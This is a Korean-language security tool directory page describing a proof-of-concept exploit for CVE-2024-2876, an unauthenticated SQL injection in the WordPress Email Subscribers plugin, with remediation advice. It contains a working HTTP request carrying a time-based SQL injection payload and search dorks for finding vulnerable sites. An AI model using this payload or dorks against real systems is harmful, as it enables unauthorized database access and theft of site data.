Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2024-2876 — CVE-2024-2876에 대한 개념 증명 익스플로잇으로, WordPress용 Email Subscribers 플러그인의 인증되지 않은 SQL 인젝션 취약점으로 민감한 데이터 추출을 가능하게 합니다. | Kitploit
도구/GitHubGitHub/chsxthwik/cve-2024-2876
Vulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringPenetration Testing
GitHubchsxthwik/cve-2024-2876

CVE-2024-2876

CVE-2024-2876에 대한 개념 증명 익스플로잇으로, WordPress용 Email Subscribers 플러그인의 인증되지 않은 SQL 인젝션 취약점으로 민감한 데이터 추출을 가능하게 합니다.

저장소 보기
22341년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2024-2876

#취약점 설명: WordPress용 Email Subscribers by Icegram Express – Email Marketing, Newsletters, Automation for WordPress & WooCommerce 플러그인은 사용자가 제공한 매개변수에 대한 이스케이프 처리 부족과 기존 SQL 쿼리에 대한 충분한 준비(preparation) 부족으로 인해 5.7.14를 포함한 모든 버전에서 ‘IG_ES_Subscribers_Query’ 클래스의 ‘run’ 함수를 통한 SQL 인젝션에 취약합니다. 이로 인해 인증되지 않은 공격자가 기존 쿼리에 추가 SQL 쿼리를 덧붙여 데이터베이스에서 민감한 정보를 추출할 수 있습니다.

#Dork: 1- FOFA : body="/wp-content/plugins/email-subscribers/" 2- publicwww : "/wp-content/plugins/email-subscribers/"

#POC: POST /wp-admin/admin-post.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded

page=es_subscribers&is_ajax=1&action=_sent&advanced_filter[conditions][0][0][field]=status=99924)))union(select(sleep(4)))--+&advanced_filter[conditions][0][0][operator]==&advanced_filter[conditions][0][0][value]=1111

#Youtube POC: https://www.youtube.com/watch?v=eDEGt_yXyvE

#수정 방법: 5.7.14까지의 모든 버전이 이 CVE의 영향을 받는 것으로 확인되었으므로, 사용자는 Email Subscribers by Icegram Express 플러그인을 5.7.15 버전(또는 최신 릴리스 5.7.19)으로 업그레이드하는 것이 좋습니다. Patchstack 사용자는 취약한 플러그인에 대해 자동 업데이트를 활성화할 수 있습니다. 추가 보호 계층으로 WAF/WAAP 솔루션을 구현하십시오. 이러한 솔루션의 장점은 취약점이 새롭고 알려지지 않은(0-day) 경우에도 공격 패턴과 기법을 탐지하여 공격을 차단할 수 있다는 것입니다.

#리소스: https://www.wordfence.com/blog/2024/04/1250-bounty-awarded-for-unauthenticated-sql-injection-vulnerability-patched-in-email-subscribers-by-icegram-express-wordpress-plugin/

도구 다운로드